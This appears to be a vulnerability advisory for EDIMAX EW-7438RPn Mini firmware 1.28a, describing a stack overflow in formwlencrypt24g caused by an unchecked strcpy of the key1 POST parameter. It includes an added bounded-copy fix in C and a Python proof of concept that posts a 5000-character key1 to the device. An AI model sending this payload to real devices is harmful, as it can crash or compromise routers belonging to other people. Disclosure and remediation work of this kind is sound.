Overview

Affected version

EW-7438RPn Mini Firmware 1.28a (Version : 1.28a)

Vulnerability details

The EDIMAX EW-7438RPn Mini firmware 1.28a (Version : 1.28a) has a stack overflow vulnerability in the formwlencrypt24g function. The function receives the key1 parameter from a POST request and passes it to strcpy(v53, v27). Because the user controls this input and strcpy performs no length check, an overlong key1 value overflows the destination buffer.
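A bounded replacement for the unchecked strcpy, as an added example that is not code from the firmware or from the original report. It assumes key1 carries a WEP key (5 or 13 ASCII characters, or 10 or 26 hex digits); copy_wep_key, the enums and WEP_KEY_BUF are hypothetical names, and the firmware's real buffer size is not shown on the page.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical names; the page only shows the decompiled strcpy(v53, v27). */
enum wep_bits { WEP_64, WEP_128 };
enum wep_fmt  { WEP_ASCII, WEP_HEX };
#define WEP_KEY_BUF 27  /* assumed size: 26 hex digits (128-bit WEP) + NUL */

/* Number of characters a WEP key of this size and format must have. */
static size_t wep_expected_len(enum wep_bits bits, enum wep_fmt fmt)
{
    size_t raw = (bits == WEP_64) ? 5 : 13;
    return (fmt == WEP_HEX) ? raw * 2 : raw;
}

/* Returns 0 and fills dst on success; returns -1 and leaves dst untouched otherwise. */
int copy_wep_key(char *dst, size_t dst_size, const char *src,
                 enum wep_bits bits, enum wep_fmt fmt)
{
    if (dst == NULL || src == NULL) return -1;
    size_t want = wep_expected_len(bits, fmt);
    if (want + 1 > dst_size) return -1;          /* destination too small */
    /* Bounded scan: never reads more than want + 1 bytes of the request value. */
    size_t got = 0;
    while (got <= want && src[got] != '\0') got++;
    if (got != want) return -1;                  /* too short or too long */
    if (fmt == WEP_HEX)
        for (size_t i = 0; i < got; i++)
            if (!isxdigit((unsigned char)src[i])) return -1;
    memcpy(dst, src, got);
    dst[got] = '\0';
    return 0;
}

int main(void)
{
    char key[WEP_KEY_BUF], big[5001];            /* constructed sample inputs */
    memset(big, 'A', sizeof big - 1);
    big[sizeof big - 1] = '\0';
    printf("valid key: %d\n", copy_wep_key(key, sizeof key, "abcde", WEP_64, WEP_ASCII));
    printf("oversized: %d\n", copy_wep_key(key, sizeof key, big, WEP_64, WEP_ASCII));
    return 0;
}
```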


POC

import requests

ip = "192.168.153.2"

payload = "A" * 5000
data = {
    "wlenabled":      "yes",
    "ssid":           "TestAP",
    "method":         "1",
    "chan":            "6",
    "wpaCipher":      "1",
    "wepEnabled":     "ON",
    "length":         "1",
    "format":         "1",
    "defaultTxKeyId": "1",
    "key1":           payload,
    "pskFormat":      "0",
    "pskValue":       "",
    "submit-url":     "/wireless.asp",
    "CONN_TEST_TRUE": "",
}

url = f"http://{ip}/goform/formwlencrypt24g"

res = requests.post(url=url, data=data, verify=False)
print(res)
